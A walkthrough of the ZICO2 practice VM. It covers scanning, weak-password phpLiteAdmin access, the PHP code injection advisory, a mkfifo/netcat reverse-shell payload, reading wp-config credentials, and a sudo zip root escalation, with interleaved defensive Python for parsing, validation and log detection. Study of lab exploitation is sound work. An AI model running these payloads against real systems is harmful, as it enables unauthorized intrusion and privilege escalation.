Red team target practice: ZICO2: 1

Information gathering

1. arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.12.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.12.1    00:50:56:c0:00:08       VMware, Inc.
192.168.12.2    00:50:56:ec:d1:ca       VMware, Inc.
192.168.12.134  00:0c:29:a2:4b:6c       VMware, Inc.
192.168.12.254  00:50:56:e7:0d:60       VMware, Inc.

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.352 seconds (108.84 hosts/sec). 4 responded


2. netdiscover
netdiscover -r 192.168.12.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts

 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.12.1    00:50:56:c0:00:08      1      60  VMware, Inc.
 192.168.12.2    00:50:56:ec:d1:ca      1      60  VMware, Inc.
 192.168.12.134  00:0c:29:a2:4b:6c      1      60  VMware, Inc.
 192.168.12.254  00:50:56:e7:0d:60      1      60  VMware, Inc.


3. nmap
Host discovery

┌──(root㉿ru)-[~/kali]
└─# nmap -sn 192.168.12.0/24 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-16 14:23 CST
Nmap scan report for 192.168.12.1
Host is up (0.0011s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.12.2
Host is up (0.000067s latency).
MAC Address: 00:50:56:EC:D1:CA (VMware)
Nmap scan report for 192.168.12.134
Host is up (0.000097s latency).
MAC Address: 00:0C:29:A2:4B:6C (VMware)
Nmap scan report for 192.168.12.254
Host is up (0.00011s latency).
MAC Address: 00:50:56:E7:0D:60 (VMware)
Nmap scan report for 192.168.12.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.39 seconds


Port scan

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.12.134 --min-rate 10000  -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-16 14:23 CST
Nmap scan report for 192.168.12.134
Host is up (0.0012s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
57368/tcp open  unknown
MAC Address: 00:0C:29:A2:4B:6C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 7.48 seconds


Service and OS detection

┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -PN -O -p 22,80,111,57368 192.168.12.134 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-16 14:25 CST
Nmap scan report for 192.168.12.134
Host is up (0.00031s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
|   2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
|_  256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Zico's Shop
|_http-server-header: Apache/2.2.22 (Ubuntu)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          34303/udp6  status
|   100024  1          36261/udp   status
|   100024  1          47838/tcp6  status
|_  100024  1          57368/tcp   status
57368/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:A2:4B:6C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.04 seconds


Vulnerability scan

┌──(root㉿ru)-[~/kali]
└─# nmap --script=vuln -p 22,80,111,57368 192.168.12.134 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-16 14:28 CST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.12.134
Host is up (0.00030s latency).

PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-sql-injection:
|   Possible sqli for queries:
|     http://192.168.12.134:80/vendor/bootstrap/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.134:80/vendor/bootstrap/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.134:80/vendor/bootstrap/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.134:80/vendor/bootstrap/js/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.12.134:80/vendor/jquery/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.134:80/vendor/jquery/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.134:80/vendor/jquery/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.12.134:80/vendor/jquery/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.134:80/vendor/bootstrap/js/?C=S%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.12.134:80/vendor/bootstrap/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.134:80/vendor/bootstrap/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.134:80/vendor/bootstrap/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.134:80/vendor/bootstrap/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.134:80/vendor/bootstrap/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.134:80/vendor/bootstrap/js/?C=D%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.12.134:80/vendor/bootstrap/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.134:80/vendor/bootstrap/js/?C=M%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.12.134:80/vendor/bootstrap/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.134:80/vendor/bootstrap/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|_    http://192.168.12.134:80/vendor/bootstrap/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /view/index.shtml: Axis 212 PTZ Network Camera
|   /dbadmin/: phpMyAdmin
|   /css/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
|   /img/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
|   /js/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
|   /vendor/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
|_  /view/: Potentially interesting folder
111/tcp   open  rpcbind
57368/tcp open  unknown
MAC Address: 00:0C:29:A2:4B:6C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 57.08 seconds


4. nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.12.134
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.12.134
+ Target Hostname:    192.168.12.134
+ Target Port:        80
+ Start Time:         2023-12-16 14:30:30 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ /: Server may leak inodes via ETags, header found with file /, inode: 3803593, size: 7970, mtime: Fri Jun  9 03:18:30 2017. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.html. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /css/: Directory indexing found.
+ /css/: This might be interesting.
+ /img/: Directory indexing found.
+ /img/: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /view.php?ariadne=http://blog.cirt.net/rfiinc.txt?: Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.26.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ /README.md: Readme Found.
+ 8909 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2023-12-16 14:30:47 (GMT8) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

5. whatweb
┌──(root㉿ru)-[~/kali]
└─# whatweb -v http://192.168.12.134
WhatWeb report for http://192.168.12.134
Status    : 200 OK
Title     : Zico's Shop
IP        : 192.168.12.134
Country   : RESERVED, ZZ

Summary   : Apache[2.2.22], Bootstrap, Email[feedback@startbootstrap.com,your-email@your-domain.com], HTML5, HTTPServer[Ubuntu Linux][Apache/2.2.22 (Ubuntu)], JQuery, Script, X-UA-Compatible[IE=edge]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.2.22 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ Bootstrap ]
        Bootstrap is an open source toolkit for developing with
        HTML, CSS, and JS.

        Website     : https://getbootstrap.com/

[ Email ]
        Extract email addresses. Find valid email address and
        syntactically invalid email addresses from mailto: link
        tags. We match syntactically invalid links containing
        mailto: to catch anti-spam email addresses, eg. bob at
        gmail.com. This uses the simplified email regular
        expression from
        http://www.regular-expressions.info/email.html for valid
        email address matching.

        String       : feedback@startbootstrap.com,your-email@your-domain.com
        String       : your-email@your-domain.com

[ HTML5 ]
        HTML version 5, detected by the doctype declaration


[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Ubuntu Linux
        String       : Apache/2.2.22 (Ubuntu) (from server string)

[ JQuery ]
        A fast, concise, JavaScript that simplifies how to traverse
        HTML documents, handle events, perform animations, and add
        AJAX.

        Website     : http://jquery.com/

[ Script ]
        This plugin detects instances of script HTML elements and
        returns the script language/type.


[ X-UA-Compatible ]
        This plugin retrieves the X-UA-Compatible value from the
        HTTP header and meta http-equiv tag. - More Info:
        http://msdn.microsoft.com/en-us/library/cc817574.aspx

        String       : IE=edge

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Sat, 16 Dec 2023 06:31:28 GMT
        Server: Apache/2.2.22 (Ubuntu)
        Last-Modified: Thu, 08 Jun 2017 19:18:30 GMT
        ETag: "3a09c9-1f22-55177b7ccfb97"
        Accept-Ranges: bytes
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 2176
        Connection: close
        Content-Type: text/html


6. masscan
┌──(root㉿ru)-[~/kali]
└─# masscan -p- 192.168.12.134 --rate=10000
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2023-12-16 06:46:29 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 57368/tcp on 192.168.12.134
Discovered open port 22/tcp on 192.168.12.134
Discovered open port 80/tcp on 192.168.12.134
Discovered open port 111/tcp on 192.168.12.134
rate:  0.00-kpps, 100.00% done, waiting 2-secs, found=4

Information gathering summary
Host discovery found the target host's IP; the open ports on it are 22, 80, 111 and 57368:

22/tcp    open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)

80/tcp    open  http    Apache httpd 2.2.22 ((Ubuntu))

111/tcp   open  rpcbind 2-4 (RPC #100000)

57368/tcp open  status  1 (RPC #100024)
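As an added example (not part of the original write-up), the following Python turns the nmap service-detection output above into an inventory a defender can diff against a baseline: it parses the port lines, lists open ports that are absent from an approved baseline, and flags banners matching a policy table of unsupported versions. The baseline {22, 80} and the EOL prefix table are assumptions made for this example.

```python
import re

# Constructed input for this example: the port lines from the nmap -sC -sV run
# above, copied verbatim (NSE script lines starting with '|' are included to
# show that the parser skips them).
NMAP_OUTPUT = """\
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_  256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Zico's Shop
111/tcp   open  rpcbind 2-4 (RPC #100000)
57368/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:A2:4B:6C (VMware)
"""

# One port line of nmap's normal output: "<port>/<proto> <state> <service> [<version>]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Hypothetical policy table for this example: version prefixes treated as
# unsupported. Apache 2.2 is end-of-life (nikto reports this above); the
# OpenSSH 5.x line is likewise long unmaintained.
EOL_PREFIXES = {
    "Apache httpd 2.2": "Apache 2.2 branch is end-of-life",
    "OpenSSH 5.": "OpenSSH 5.x is no longer maintained",
}


def parse_nmap_ports(text):
    """Return one record per port line; NSE script lines ('|', '|_') are skipped."""
    records = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if not m:
            continue
        port, proto, state, service, version = m.groups()
        records.append({
            "port": int(port), "proto": proto, "state": state,
            "service": service, "version": (version or "").strip(),
        })
    return records


def unexpected_exposure(records, baseline):
    """Open ports that are not in the approved baseline for this host."""
    return sorted(r["port"] for r in records
                  if r["state"] == "open" and r["port"] not in baseline)


def eol_findings(records):
    """(port, reason) for every service whose banner matches an EOL prefix."""
    out = []
    for r in records:
        for prefix, reason in EOL_PREFIXES.items():
            if r["version"].startswith(prefix):
                out.append((r["port"], reason))
    return out


if __name__ == "__main__":
    recs = parse_nmap_ports(NMAP_OUTPUT)
    for r in recs:
        print(f"{r['port']}/{r['proto']:<4} {r['service']:<8} {r['version']}")
    # Baseline for a public web host: only ssh and http should be reachable,
    # so rpcbind (111) and the status RPC service (57368) show up as drift.
    print("unexpected:", unexpected_exposure(recs, baseline={22, 80}))
    print("end-of-life:", eol_findings(recs))
```

The same parser works on any `nmap -sV` normal-output file saved with `-oN`; the point of the baseline comparison is that the two RPC ports are exposure that a web host does not need, independent of whether they carry a known vulnerability.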


Directory enumeration

1. gobuster
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir -u http://192.168.12.134 -x php.txt,html,bak -w directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.12.134
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,bak,php.txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 287]
/index.html           (Status: 200) [Size: 7970]
/index                (Status: 200) [Size: 7970]
/img                  (Status: 301) [Size: 314] [--> http://192.168.12.134/img/]
/tools.html           (Status: 200) [Size: 8355]
/tools                (Status: 200) [Size: 8355]
/view                 (Status: 200) [Size: 0]
/css                  (Status: 301) [Size: 314] [--> http://192.168.12.134/css/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.12.134/js/]
/vendor               (Status: 301) [Size: 317] [--> http://192.168.12.134/vendor/]
/package              (Status: 200) [Size: 789]
/less                 (Status: 301) [Size: 315] [--> http://192.168.12.134/less/]
/.html                (Status: 403) [Size: 287]
/server-status        (Status: 403) [Size: 295]
/dbadmin              (Status: 301) [Size: 318] [--> http://192.168.12.134/dbadmin/]
Progress: 830572 / 830576 (100.00%)
===============================================================
Finished
===============================================================


2. dirsearch
┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.12.134 -e*
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz
HTTP method: GET | Threads: 25 | Wordlist size: 14594

Output File: /root/kali/reports/http_192.168.12.134/_23-12-16_14-51-37.txt

Target: http://192.168.12.134/

[14:51:37] Starting:
[14:51:37] 301 -  245B  - /js  ->  http://192.168.12.134/js/
[14:51:54] 301 -  246B  - /css  ->  http://192.168.12.134/css/
[14:51:54] 301 -  250B  - /dbadmin  ->  http://192.168.12.134/dbadmin/
[14:51:54] 200 -  456B  - /dbadmin/
[14:51:58] 200 -  964B  - /gulpfile.js
[14:51:59] 301 -  247B  - /img  ->  http://192.168.12.134/img/
[14:52:00] 200 -  468B  - /js/
[14:52:01] 200 -    1KB - /LICENSE
[14:52:05] 200 -  789B  - /package
[14:52:05] 200 -  789B  - /package.json
[14:52:09] 200 -    1KB - /README.md
[14:52:16] 200 -    1KB - /tools
[14:52:17] 200 -  506B  - /vendor/
[14:52:18] 200 -   20B  - /view.php

Task Completed


3. feroxbuster
Same approach as above.

4. dirb
Same approach as above.

WEB

Port 80

Redirects here. After probing the main page, there is nothing useful to exploit.

File inclusion

Testing shows that a file inclusion vulnerability exists here.

phpmyadmin

Path: /dbadmin/test_db.php

Log in with the weak password admin.

Accounts and password hashes obtained:

root 653F4B285089453FE00E2AAFAC573414
zico 96781A607F4E9F5F423AC01F0DAB0EBD

MD5 lookup:

root 34kroot34
zico zico2215@

phpLiteAdmin exploitation

1. searchsploit
┌──(root㉿ru)-[~/kali]
└─# searchsploit phpLiteAdmin 1.9.3
---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
PHPLiteAdmin 1.9.3 - Remote PHP Code Injectio | php/webapps/24044.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results



┌──(root㉿ru)-[~/kali]
└─# searchsploit -m 24044.txt
  Exploit: PHPLiteAdmin 1.9.3 - Remote PHP Code Injection
      URL: https://www.exploit-db.com/exploits/24044
     Path: /usr/share/exploitdb/exploits/php/webapps/24044.txt
    Codes: OSVDB-89126
 Verified: True
File Type: ASCII text
Copied to: /root/kali/24044.txt


2. payload
# Exploit Title: phpliteadmin <= 1.9.3 Remote PHP Code Injection Vulnerability
# Google Dork: inurl:phpliteadmin.php (Default PW: admin)
# Date: 01/10/2013
# Exploit Author: L@usch - http://la.usch.io - http://la.usch.io/files/exploits/phpliteadmin-1.9.3.txt
# Vendor Homepage: http://code.google.com/p/phpliteadmin/
# Vendor Status: Informed
# Software Link: http://phpliteadmin.googlecode.com/files/phpliteadmin_v1-9-3.zip
# Version: 1.9.3
# Tested on: Windows and Linux

Description:

phpliteadmin.php#1784: 'Creating a New Database' =>
phpliteadmin.php#1785: 'When you create a new database, the name you entered will be appended with the appropriate file extension (.db, .db3, .sqlite, etc.) if you do not include it yourself. The database will be created in the directory you specified as the $directory variable.',

An Attacker can create a sqlite Database with a php extension and insert PHP Code as text fields. When done, the Attacker can execute it simply by accessing the database file with the Webbrowser.

Proof of Concept:

1. We create a db named "hack.php".
(Depending on Server configuration sometimes it will not work and the name for the db will be "hack.sqlite". Then simply try to rename the database / existing database to "hack.php".)
The script will store the sqlite database in the same directory as phpliteadmin.php.
Preview: http://goo.gl/B5n9O
Hex preview: http://goo.gl/lJ5iQ

2. Now create a new table in this database and insert a text field with the default value:
<?php phpinfo()?>
Hex preview: http://goo.gl/v7USQ

3. Now we run hack.php

Done!

Proof: http://goo.gl/ZqPVL   
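The root cause described in the advisory is that the database name a user supplies is stored as a file name, with whatever extension it carries, in a directory that Apache serves. As an added example (not code from phpLiteAdmin or from this write-up), the Python below shows the two checks that close that gap: a file-name validator that only ever produces one of the extensions the advisory's help text lists, and a check that the data directory sits outside the document root. ALLOWED_EXTS, BASENAME_RE and the paths in the usage section are assumptions made for this example.

```python
import os
import re

# Extensions phpLiteAdmin's own help text (quoted in the advisory) says it appends
ALLOWED_EXTS = (".db", ".db3", ".sqlite")
# One plain token: letters, digits, '_' and '-' only, so no dot and therefore no
# second extension can survive into the stored file name (assumed policy).
BASENAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def safe_db_filename(user_input, default_ext=".db"):
    """Return a validated file name for a new database, or raise ValueError.

    Unlike "append an extension if none is present", a name carrying any
    extension outside ALLOWED_EXTS is rejected rather than stored, so the
    advisory's 'hack.php' never reaches the filesystem.
    """
    if "\x00" in user_input or "/" in user_input or "\\" in user_input:
        raise ValueError("path separators and NUL are not allowed")
    name = user_input.strip()
    base, ext = name, default_ext
    for allowed in ALLOWED_EXTS:
        if name.lower().endswith(allowed):
            base, ext = name[: -len(allowed)], allowed
            break
    # 'hack.php' fails because of the dot; 'hack.php.db' fails for the same
    # reason, which matters because an AddHandler-style mod_php configuration
    # can execute a file whose name merely contains '.php'.
    if not BASENAME_RE.match(base):
        raise ValueError(f"invalid database name: {user_input!r}")
    return base + ext


def rejects(user_input):
    """True when safe_db_filename refuses the name (helper for the checks)."""
    try:
        safe_db_filename(user_input)
    except ValueError:
        return True
    return False


def db_dir_outside_webroot(db_dir, webroot):
    """Second layer: the SQLite directory must not be under the document root,
    so even a mis-named file could never be served or executed by Apache."""
    db_dir, webroot = os.path.realpath(db_dir), os.path.realpath(webroot)
    return os.path.commonpath([db_dir, webroot]) != webroot


if __name__ == "__main__":
    for candidate in ("shop", "shop.sqlite", "hack.php", "hack.php.db", "../shop"):
        verdict = "rejected" if rejects(candidate) else safe_db_filename(candidate)
        print(f"{candidate!r:16} -> {verdict}")
    # Hypothetical paths: a data directory inside the served tree vs. outside it
    print(db_dir_outside_webroot("/var/www/dbadmin", "/var/www"))       # False
    print(db_dir_outside_webroot("/var/lib/phpliteadmin", "/var/www"))  # True
```

The validator on its own stops the advisory's trick; the directory check is what makes the fix robust against the next bypass, because a file that Apache cannot reach cannot be executed regardless of its name.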

3. Exploitation



Reverse shell payload

<?php
  passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip port >/tmp/f");
?>

Modify the existing table directly and insert the PHP reverse shell, then request it through the file inclusion.


The access path is also linked from the homepage. We only need to include that file through the file inclusion vulnerability above to get the reverse shell.
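Detection for the two request patterns this section relies on, as an added example that is not part of the original write-up: a traversal or a remote URL in view.php's include parameter (the parameter name ariadne comes from the nikto output above), and a request for a .php file under /dbadmin/ that is not one of the known phpLiteAdmin scripts. The log lines are constructed in Apache combined format, and the allow-list of phpLiteAdmin script names is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-log lines for this example (not from the box):
# a benign page load, a traversal value and a remote URL in view.php's include
# parameter, a request for a .php file dropped into /dbadmin/, and a normal
# phpLiteAdmin request.
ACCESS_LOG = """\
192.168.12.128 - - [16/Dec/2023:14:51:37 +0800] "GET /tools.html HTTP/1.1" 200 8355 "-" "Mozilla/5.0"
192.168.12.128 - - [16/Dec/2023:15:02:10 +0800] "GET /view.php?ariadne=../../../../etc/passwd HTTP/1.1" 200 1823 "-" "Mozilla/5.0"
192.168.12.128 - - [16/Dec/2023:15:02:41 +0800] "GET /view.php?ariadne=http://blog.cirt.net/rfiinc.txt? HTTP/1.1" 200 20 "-" "Mozilla/5.0"
192.168.12.128 - - [16/Dec/2023:15:05:03 +0800] "GET /dbadmin/hack.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.12.128 - - [16/Dec/2023:15:05:30 +0800] "GET /dbadmin/test_db.php?action=row_view HTTP/1.1" 200 4560 "-" "Mozilla/5.0"
"""

# client, timestamp, method, request target, status, size (combined log format)
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# view.php's include parameter, as seen in the nikto probe above
INCLUDE_PARAMS = {"ariadne"}
# Hypothetical allow-list: the only .php files that should exist under /dbadmin/
KNOWN_DBADMIN_SCRIPTS = {"test_db.php", "phpliteadmin.php"}
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)


def classify(request_target):
    """Return the list of findings for one request's path and query string."""
    url = urlsplit(request_target)
    findings = []
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key not in INCLUDE_PARAMS:
            continue
        v = unquote(value)  # parse_qsl decoded once; decode again to catch %252e%252e
        if ".." in v or v.startswith("/"):
            findings.append("local file inclusion attempt")
        if SCHEME_RE.match(v):
            findings.append("remote file inclusion attempt")
    if url.path.startswith("/dbadmin/") and url.path.lower().endswith(".php"):
        if url.path.rsplit("/", 1)[-1] not in KNOWN_DBADMIN_SCRIPTS:
            findings.append("unexpected .php under phpLiteAdmin directory")
    return findings


def scan_log(text):
    """(client, request target, finding) for every suspicious request in the log."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _ts, _method, target, _status, _size = m.groups()
        for finding in classify(target):
            alerts.append((client, target, finding))
    return alerts


if __name__ == "__main__":
    for client, target, finding in scan_log(ACCESS_LOG):
        print(f"{client}  {finding}: {target}")
```

The third rule is the cheap one to deploy on a box like this: a .php file appearing under the phpLiteAdmin directory that the deployment never shipped is the artefact of the advisory's technique, and a file-integrity check over that directory catches it even when the request never reaches the access log.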

4. Reverse shell
┌──(root㉿ru)-[~/kali]
└─# nc -nlvp 3366
listening on [any] 3366 ...
connect to [192.168.12.128] from (UNKNOWN) [192.168.12.135] 43023
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$



Privilege escalation

user and pass
www-data@zico:/home/zico/wordpress$ cat wp-config.php
cat wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'zico');

/** MySQL database username */
define('DB_USER', 'zico');

/** MySQL database password */
define('DB_PASSWORD', 'sWfCsfJSPV9H3AmQzw8');


In zico's home directory we find a wordpress directory; reading its wp-config.php reveals an account and password:


zico  sWfCsfJSPV9H3AmQzw8


ssh
┌──(root㉿ru)-[~/kali]
└─# ssh zico@192.168.12.135
The authenticity of host '192.168.12.135 (192.168.12.135)' can't be established.
ECDSA key fingerprint is SHA256:+zgKqxyYlTBxVO0xtTVGBokreS9Zr71wQGvnG/k2igw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.12.135' (ECDSA) to the list of known hosts.
zico@192.168.12.135's password:

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

zico@zico:~$ id
uid=1000(zico) gid=1000(zico) groups=1000(zico)
zico@zico:~$ sudo -l
Matching Defaults entries for zico on this host:
    env_reset, exempt_group=admin,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User zico may run the following commands on this host:
    (root) NOPASSWD: /bin/tar
    (root) NOPASSWD: /usr/bin/zip
zico@zico:~$


After connecting over SSH, sudo -l shows that zip can be used for privilege escalation.

zico@zico:~$ TF=$(mktemp -u)
zico@zico:~$ sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 35%)
# sudo rm $TF
rm: missing operand
Try `rm --help' for more information.
# id
uid=0(root) gid=0(root) groups=0(root)
#


payload

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF
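Seen from the defender's side, the finding above is a sudoers rule that lets an unprivileged user run tar and zip as root without a password; both accept options that execute other commands, so the rule is equivalent to handing out a root shell. As an added example (not from the original post), the following Python parses `sudo -l` output like the one shown and reports such rules. The list of shell-escape-capable binaries and the extra /sbin/reboot rule are constructed for the example.

```python
import os
import re

# Constructed input: the `sudo -l` output shown above, plus one extra rule
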